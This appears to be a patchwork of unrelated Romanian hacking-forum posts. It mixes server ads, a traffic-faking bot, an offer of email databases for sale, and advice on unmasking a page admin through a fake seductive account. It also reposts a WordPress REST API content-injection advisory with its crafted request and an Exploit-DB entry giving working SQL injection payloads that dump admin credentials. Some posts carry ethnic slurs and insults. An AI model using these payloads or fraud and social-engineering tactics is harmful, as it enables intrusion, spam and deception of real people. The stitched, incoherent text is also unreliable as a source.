Leaderboard

Mosh Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes. Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links. Mosh is free software, available for GNU/Linux, BSD, macOS, Solaris, Android, Chrome, and iOS. https://mosh.org/#getting Pentru Windows nu exista un client, dar se poate folosi aplicatia de Chrome - https://chrome.google.com/webstore/detail/mosh/ooiklbnjmhbcgemelgfhaeaocllobloj se impaca bine cu tmux.

Syllabus Section: Preliminary Skills - Prerequisites Module 1 : Introduction Module 2 : Networking Module 3 : Web Applications Module 4 : Penetration Testing Section: Preliminary Skills - Programming Module 1 : C++ Module 2 : Python Section: Penetration Testing Module 1 : Information Gathering Module 2 : Footprinting & Scanning Module 3 : Vulnerability Assessment Module 4 : Web Attacks Module 5 : System Attacks Module 6 : Network Attacks Invitatie: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK

Servere dedicate la preturi bune. Config 1: Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache 16 GB DDR3 Memory 1 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 60 euro Setup fee: 65 euro Config 2: Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache 32 GB DDR3 Memory 2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 88 euro Setup fee: 65 euro Config 3: Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache 32 GB DDR3 Memory 1 x 2 TB SATA3 Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 110 euro Setup fee: 65 euro Config 4: Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache 32 GB DDR3 Memory 2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Raid 1 Hardware controller (Adaptec/3Ware) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 130 euro Setup fee: 65 euro Config 5: Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache 16 GB DDR3 Memory 2 x 2TB eSATA Enterprise Raid 1 Hardware controller (Adaptec/3Ware) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 150 euro Setup fee: 65 euro Config 6: Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache 32 GB DDR3 Memory 4 x 2TB SATA3 Raid 10 Hardware controller (Adaptec/3Ware Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 200 euro Setup fee: 65 euro Note: - Latimea de banda este garantata catre orice destinatie (EU/US/Asia) / Avem peer-uri private cu peste 300 de furnizori. Cu tot ce nu este peer, iesim cu conexiune prin Level3, Cogent, Telia, Hurricane Electric si NTT. De asemenea, pe BGP folosim solutiile Noction (in caz ca exista loss pe o routa aleasa de BGP, se comuta pe o alta) - Nu se accepta child porn/spam/scan/phishing/fraude - Serverele sunt activate in aproximativ 3 zile de la efectuarea platii - Adresele IP alocate sunt de Germania. - Plata se poate face prin PayPal. - Se poate face contract daca este necesar. - Preturile de mai sus sunt finale si nu se mai adauga TVA sau altceva la ele. - La cerere, se poate instala pe servere apache, php, mysql, nginx. De asemenea, se poate face si un tuning initial pe langa instalare. (nu au cost aditional) - Consultanta si suport tehnic premium pentru tot ce se mananca cu linux. (atat telefonic cat si pe email) - Pe langa serverele prezentate, avem toata gama de la HP (de la HP DL120 pana la DL980), dar e clar ca acolo sunt alte costuri pentru ca nu se incadreaza la categoria 'low end/cost' - Cine vrea sa reinchirieze serverele, putem colabora si putem face alte preturi. (discutam) - OS-uri: Orice distributie de linux, FreeBSD, NetBSD, OpenBSD, Solaris. Momentan nu avem Windows pentru ca acestea au un cost ridicat de licentiere si nu oferim suport tehnic pentru asa ceva ;-) Cei interesati sunt rugati sa dea un mesaj privat. La nevoie, pot sa va sun personal pentru a va da mai multe detalii. wget tests (without tcp tuning): root@pluto:~# wget -O /dev/null http://cachefly.cachefly.net/100mb.test --2013-12-15 20:55:24-- http://cachefly.cachefly.net/100mb.test Resolving cachefly.cachefly.net (cachefly.cachefly.net)... 205.234.175.175 Connecting to cachefly.cachefly.net (cachefly.cachefly.net)|205.234.175.175|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 104857600 (100M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 104,857,600 94.9M/s in 1.1s 2013-12-15 20:55:25 (94.9 MB/s) - `/dev/null' saved [104857600/104857600] root@pluto:~# wget -O /dev/null http://mirror.de.leaseweb.net/speedtest/100mb.bin --2013-12-15 20:56:13-- http://mirror.de.leaseweb.net/speedtest/100mb.bin Resolving mirror.de.leaseweb.net (mirror.de.leaseweb.net)... 46.165.198.1, 2a00:c98:2010:1:1:face:d06:f00d Connecting to mirror.de.leaseweb.net (mirror.de.leaseweb.net)|46.165.198.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 100000000 (95M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 100,000,000 64.3M/s in 1.5s 2013-12-15 20:56:14 (64.3 MB/s) - `/dev/null' saved [100000000/100000000] root@pluto:~# wget -O /dev/null http://mirror.leaseweb.com/speedtest/100mb.bin --2013-12-15 20:56:20-- http://mirror.leaseweb.com/speedtest/100mb.bin Resolving mirror.leaseweb.com (mirror.leaseweb.com)... 94.75.223.121, 2001:1af8:4030:1:0:dead:beef:cafe Connecting to mirror.leaseweb.com (mirror.leaseweb.com)|94.75.223.121|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 100000000 (95M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 100,000,000 78.0M/s in 1.2s 2013-12-15 20:56:22 (78.0 MB/s) - `/dev/null' saved [100000000/100000000] root@pluto:~# wget -O /dev/null http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso --2014-01-28 00:30:34-- http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso Resolving ftp.iasi.roedu.net (ftp.iasi.roedu.net)... 81.180.250.146, 2001:b30:1::146 Connecting to ftp.iasi.roedu.net (ftp.iasi.roedu.net)|81.180.250.146|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1284395008 (1.2G) [application/octet-stream] Saving to: `/dev/null' 43% [================================> ] 554,423,034 103M/s eta 9s ^C root@pluto:~# wget -O /dev/null http://mirror.nl.leaseweb.net/speedtest/10000mb.bin -4 --2014-02-24 23:07:19-- http://mirror.nl.leaseweb.net/speedtest/10000mb.bin Resolving mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)... 94.75.223.121 Connecting to mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)|94.75.223.121|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10000000000 (9.3G) [application/octet-stream] Saving to: `/dev/null' 5% [====> ] 511,839,952 108M/s eta 91s ^C root@pluto:~# hdparm test pe un server cu SSD Force3: root@ns:~# hdparm -t --direct /dev/sda1 /dev/sda1: Timing O_DIRECT disk reads: 284 MB in 0.56 seconds = 509.85 MB/sec root@ns:~# hdparm -T /dev/sda1 /dev/sda1: Timing cached reads: 27844 MB in 2.00 seconds = 13940.39 MB/sec root@ns:~#

Salut ! Am postat acum ceva timp ca lucrez la un proiect si aveam nevoie de testeri pentru aplicatie. Cred ca am ajuns la o versiune momentan stabila. (mereu se poate mai bine...) Ce face aplicatia? - Deschide link-uri in Google Chrome ( Simplu nu ? practic e mai greu ) Cum ? - Cu referrer customizabil (de la facebook,google,youtube la ce vrei tu) - Cu User-Agent random (Firefox,Chrome,Opera,Safari si dispozitive mobile) - Dimensiunea ferestrei (random) - Mouse Scroll pe pagina - Click pe un element ales din pagina - Timp la alegere intre (10 si 600 secunde) - Cautare pe Google / Youtube si Click ( Promovare Keywords & SEO ) - Click pe Youtube Play si Skip Ad (automat) Ip-uri unice din Romania ? - Da , fiecare utilizator din Romania va vizualiza un link doar 1 data la 24 de ore . Cat costa ? - E gratis (este o comunitate , ne ajutam unii pe altii) Necesita : -Java -Google Chrome (versiune recente) Am facut un tutorial (sper sa fie de ajutor) : Pentru membrii RST ofer suport si bonusuri. Daca sunteti interesati va rog sa ma contactati. Rog un administrator sa verifice si sa confirme daca este ok. Link : https://video-seo.ro/

Stai linistit chiar nu ai cu ce sa imi strici business-ul si chiar iti multumesc pentru intrebarile pe care le-ai adresat. Ideea mea este in felul urmator, omu imi da un pm interesat de o anumita cantitate de e-mailuri iar dupa ce cumpara eu o sa postez aici atat persoana care le-a cumparat cat si numarul lor ca restu care vin sa stie daca au fost sau nu vandute pana la momentul respectiv. Deci nu vand aceleasi mailuri la toata lumea. Nu consider ca am cantitate enorm de mare gen 10-15 milioane pt ca as minti daca as zice asta, repet sunt baze de date nu sunt extrase cu fel si fel de extractoare si toate la gramada. Singura optiune de sortare este cea care am precizat`o nu am cum sa sortez ceva cum ai zis tu pentru ca asta ar inseamna ca le amestec unele cu altele, lucru care nu imi place.

multumesc!

io.kent este banat, ultimul post este din octombrie 2014. Nu mai posta cum te trece pe tine!

Pune si tu frate Data cand le.ai bagat in partea de sus si nu ar strica sa spui daca inca mai sunt valabile

AZW-QLJ

Salut, nu am mai postat de mult dar am o mare problema... O pagina de instagram imi posteaza mie si prietenilor mei munca ( pe scurt pozeaza desenele noastre si le fce publice) am imcerat sa vorbesc cu tipul respectiv dar am primit pe 5 conuri block... Cam de cate persoane ( reale ) as avea nevoie pt a-i da report sa ii inchida contul...( mentionez ca tipul are 2k urmaritori... ) Daca are cineva idee sau ma poate ajuta raman dator, tipul efectiv isi bate joc de munca noastra!

Security Risk: Severe Exploitation Level: Easy/Remote DREAD Score: 9/10 Vulnerability: Privilege Escalation / Content Injection Patched Version: 4.7.2 As part of a vulnerability research project for our Sucuri Firewall (WAF), we have been auditing multiple open source projects looking for security issues. While working on WordPress, we discovered a severe content injection (privilege escalation) vulnerability affecting the REST API. This vulnerability allows an unauthenticated user to modify the content of any post or page within a WordPress site. We disclosed the vulnerability to the WordPress Security Team who handled it extremely well. They worked closely with us to coordinate the disclosure timeline and get as many hosts and security providers aware and patched before this became public. A fix for this was silently included on version 4.7.2 along with other less severe issues. This was done intentionally to give everyone time to patch. We are now disclosing the details because we feel there has been enough time for most WordPress users to update their sites. Are You At Risk? This privilege escalation vulnerability affects the WordPress REST API that was recently added and enabled by default on WordPress 4.7.0. One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site. The REST API is enabled by default on all sites using WordPress 4.7.0 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug. Technical Details Our journey begins in ./wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php There are a couple of things to notice here. The registered route is designed to populate the ID request parameter with digits. For example, if you are sending a request to /wp-json/wp/v2/posts/1234 – the ID parameter would be set to 1234. This behavior alone could be a good way to prevent attackers from crafting malicious ID values, but when looking at how the REST API manages access, we quickly discover that it prioritizes $_GET and $_POST values over the ones generated by the route’s regular expression. This makes it possible for an attacker to send a request like: /wp-json/wp/v2/posts/1234?id=12345helloworld – which would assign 12345helloworld to the ID parameter – which now contains more than just digits. Investigating further, we had a look at the various callbacks (in the screenshot above) and one of them kept our attention: the update_item and its permission check method update_item_permissions_check. In short, it passes our alphanumeric ID value directly to the get_post() function. This function validates the request by checking if the post actually exists and whether our user has permission to edit this post. We found this to be a curious way of sanitizing the request. If we send an ID that doesn’t have a corresponding post, we can just pass through the permission check and be allowed to continue executing requests to the update_item method! Curious about what could cause get_post() to fail at finding a post (other than a non-existent ID), we realized it used the get_instance() static method in wp_posts to grab posts. As you can see from the code, it would basically fail on any input that isn’t all made of numeric characters – so 123ABC would fail. For an attacker, this means that WordPress (thinking it’s a user with enough privilege to edit this post) would run the update_item method. We thought it would make sense to check what this method does. There is a very subtle, yet important detail in that last screenshot – WordPress casts the ID parameter to an integer before passing it to get_post! This is an issue because of the way PHP does type comparisons and conversions. For example, one can see that the following snippet would return 123: This leads to a very dangerous situation where an attacker could submit a request like /wp-json/wp/v2/posts/123?id=456ABC to change the post whose ID is 456! Due to this type-juggling issue, it is then possible for an attacker to change the content of any post or page on a victim’s site. From there, they can add plugin-specific shortcodes to exploit vulnerabilities (that would otherwise be restricted to contributor roles), infect the site content with an SEO spam campaign, or inject ads, etc. Depending on the plugins enabled on the site, even PHP code could be executed very easily. SOURCE: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

Il prinzi in capcana pe admin. Îți faci un cont de fata, dar sa para cat mai real o bunaciune, apoi ii dai like la o grămadă de poștari apoi ii trimiți mesaj ca ce mult îți place pagina lui apoi ii mai dai niste like-uri apoi ii trimiți mesaj ca îți place pagina foarte mult si ai vrea admin/editor etc ca vrei sa il ajuți cu pagina. El îți da admin si tu atunci o sa vezi cine e.... Am obosit

Te vaieti ca o pizda. Daca esti bun te doare in 14 de restul. Daca esti lipitoare normal ca stai cu frica in san ca vine altul mai breaz. Daca te uiti putin la evrei cum investesc in tineri si tehnologie, in educatia si disciplina lor, in start-up-urile lor, etc. vezi cum se pisa cu stropi pe Rro. Te uiti si la patente in plm. In 2015 Ro a avut 74 in comparatie cu Israel: 3804. Apoi din restul anilor per total: Romania 483, Israel 35900. Asta doar ca exemplu ca sa crape unii anti-semiti de pe aici. Dar te uiti si la alte natii din Asia si vezi acelasi lucru.

# # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # Etc....Other files have vulnerabilities ... # # # # # Sursa: https://www.exploit-db.com/exploits/41267/.

https://transfer.sh/KZc52/facebookautomation.rar https://transfer.sh/J4Txm/gatherproxy.rar https://transfer.sh/mhcYX/visitormaker.rar Enjoy

Foloseste: Nu trebuia sa ne precizezi ca esti un golan, mi s-au ridicat flocii dupa spate, tristut. In primul rand cu golaneala nu faci nimic, nu stiu cum merge pe la voi p'acolo cred ca aelius stie (parca p'acolo sta), ia du-te la scoala baga-te pe un profil de mate-info/cursuri cum au aia pe acolo, invata si fa proiectele pe care profesorii te pun sa le faci, altfel vei sterge si tu curu' la ceva german imputit ( asta daca esti copil, ceea ce cred ca esti ). Iar daca nu esti copil si legat de povestirea ta ca tu lucri acolo, poi incepem iarasi de la precizarea ca esti un golan si daca ai fost golan si in tinerete si nu ti-ai folosit capul cam greu il poti porni sa mai inveti ceva in domeniul asta, nu zic ca nu se poate, dar trebuie chef si vointa, ma puteti injura n-am bai ). Eu unu ma rog pentru tine sa nu ne fi mintit in legatura cu varsta ta, mai exista o sansa sa iti faci un viitor "misto", succes.

asa sa-i ajute Dumnezeu!

AGSQ: Mai dute ma in pula mea de tigan mustacios cu tot cu SRL-ul pulei mele de 200 de lei capital social si sediu social in pizda pe campuri unde nu aveti nici canalizare. Tu compari o corporatie cu cacatul tau de SRL si 400 euro incasari lunare? Cum adica server reutilizat? Tu dupa ce foloseste clientul o luna serverul, il arunci ? Pai ce flocii lu ma-ta grasa, serverul e prezervativ ? Besi in pula mea de ratat cu aberatiile si comparatiile tale de doi lei.

A mai investit cineva timp sau au mai aparut noutati?